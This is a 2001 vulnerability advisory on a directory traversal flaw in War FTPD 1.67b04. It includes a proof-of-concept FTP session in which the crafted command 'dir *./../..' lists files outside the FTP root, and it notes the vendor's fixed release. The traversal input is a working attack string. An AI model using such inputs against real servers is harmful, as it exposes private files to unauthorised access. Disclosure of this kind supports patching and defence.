War FTPD Win32 1.67b04 Allows Directory Traversal

ReportedMarch 6, 2001, by [email protected].

VERSION AFFECTED

DESCRIPTION

A vulnerabilityexists that lets an attacker break out of FTP root by using relative paths. Forexample, by connecting to a vulnerable host and issuing the command “dir*./../..”, an attacker can list the contents of the directory one level upfrom the root directory.

DEMONSTRATION

[email protected] provided the following proof-of-conceptscenario:

Verbindungmit 10.17.3.44 wurde hergestellt.

220-Jgaa's Fan Club FTP Service WAR-FTPD 1.67-04 Ready

220Please enter your user name.

Benutzer(10.17.3.44:(none)): anonymous

331User name okay. Give your full Email address as password.

Kennwort:

230User logged in, proceed.

ftp>dir

200Port command okay.

150Opening ASCII NO-PRINT mode data connection

forls -l.

total123

drwxrwxrwx1 ftp ftp 0 Mar 2 12:17 test

-rwxrwxrwx1 ftp ftp 6 Mar 2 12:33 movedtohomedir.txt

-rwxrwxrwx1 ftp ftp 11 Mar 2 00:29 bisontest.txt

drwxrwxrwx1 ftp ftp 0 Mar 3 15:59 HTTP

drwxrwxrwx1 ftp ftp 0 Mar 3 17:05 huhu

drwxrwxrwx1 ftp ftp 0 Mar 5 13:42 te

drwxrwxrwx1 ftp ftp 0 Mar 5 13:42 ..te

226Transfer finished successfully. Data connection

closed.

FTP:452 Bytes empfangen in 0,02Sekunden

22,60KB/s

ftp>cd ..

550Permission denied.

ftp>dir *./../..

200Port command okay.

150Opening ASCII NO-PRINT mode data connection

forls *./../...

total123

-rwxrwxrwx1 ftp ftp 251658240 Mar 4 18:42

WIN386.SWP

drwxrwxrwx1 ftp ftp 0 Jan 6 20:32 games

drwxrwxrwx1 ftp ftp 0 Jan 7 19:58 HalfLife

226Transfer finished successfully. Data connection

closed.

FTP:2977 Bytes empfangen in 0,07Sekunden

42,53KB/s

VENDOR RESPONSE

The vendor, Jgaa’sInternet, has released version 1.67b05 that corrects this issue. It isavailable at http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=32.

CREDIT
Discovered by [email protected].